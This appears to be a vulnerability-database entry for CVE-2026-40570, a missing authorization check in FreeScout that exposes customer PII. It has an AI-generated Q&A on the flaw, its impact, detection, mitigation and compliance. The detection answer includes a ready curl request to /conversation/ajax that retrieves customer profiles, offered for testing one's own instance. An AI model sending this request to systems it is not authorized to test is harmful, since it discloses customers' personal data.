CVE-2026-40570
Insecure Direct Object Reference in FreeScout Exposes Customer PII
Publication date: 2026-04-21
Last updated on: 2026-04-21
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| freescout | freescout | to 1.8.213 (exc) |
| freescout | freescout | 1.8.213 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-40570 is a vulnerability in FreeScout, a self-hosted help desk system. Before version 1.8.213, the `load_customer_info` action accessed via the POST endpoint `/conversation/ajax` would return complete customer profile data, including all Personally Identifiable Information (PII), to any authenticated user without verifying if they had access to the associated mailbox.
The root cause is a missing authorization check: although the system checked mailbox access to decide whether to show previous conversations, it did not restrict the return of customer data itself. This means that any authenticated user who knows a customer's email address could retrieve that customer's full profile data, regardless of mailbox permissions.
This issue was fixed in version 1.8.213 by adding stricter access control checks to ensure that customer information is only returned if the user has permission to access the mailbox.
How can this vulnerability impact me? :
This vulnerability allows an attacker with any valid user account to retrieve full customer Personally Identifiable Information (PII) simply by knowing a customer's email address.
The impact includes unauthorized disclosure of sensitive customer data, which can lead to privacy violations, identity theft, and loss of customer trust.
Since the vulnerability bypasses mailbox access controls, it can expose data that should be restricted to certain users, increasing the risk of insider threats or data leaks.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to access the `load_customer_info` action via a POST request to `/conversation/ajax` with a valid authenticated user account and a target customer's email address. If the system returns complete customer profile data without verifying mailbox access, it is vulnerable.
A practical detection method is to use a command-line tool like curl to simulate the vulnerable request:
- curl -X POST -d 'action=load_customer_info&[email protected]&mailbox_id=1' -b 'auth_cookie=your_auth_cookie' https://your-freescout-instance/conversation/ajax
If the response includes full customer Personally Identifiable Information (PII) despite the authenticated user not having access to the mailbox, the system is vulnerable.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade FreeScout to version 1.8.213 or later, where this vulnerability has been fixed by enforcing proper mailbox access checks before returning customer data.
Until the upgrade can be applied, restrict access to the `/conversation/ajax` endpoint to only trusted users and monitor for suspicious requests attempting to access customer information.
Additionally, review and tighten user permissions related to mailbox access to minimize the risk of unauthorized data exposure.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in FreeScout prior to version 1.8.213 allows any authenticated user to retrieve complete customer profile data, including all Personally Identifiable Information (PII), by providing just a valid email address without verifying mailbox access permissions.
This unauthorized disclosure of customer PII represents a failure to enforce proper authorization controls, which can lead to non-compliance with data protection regulations such as GDPR and HIPAA that require strict safeguards around access to personal and sensitive information.
By exposing customer PII to unauthorized users, the vulnerability increases the risk of data breaches and privacy violations, potentially resulting in regulatory penalties and loss of trust.
The issue was fixed in version 1.8.213 by enforcing stricter access control checks to ensure only authorized users with mailbox access can retrieve customer information, thereby helping to maintain compliance with common data protection standards.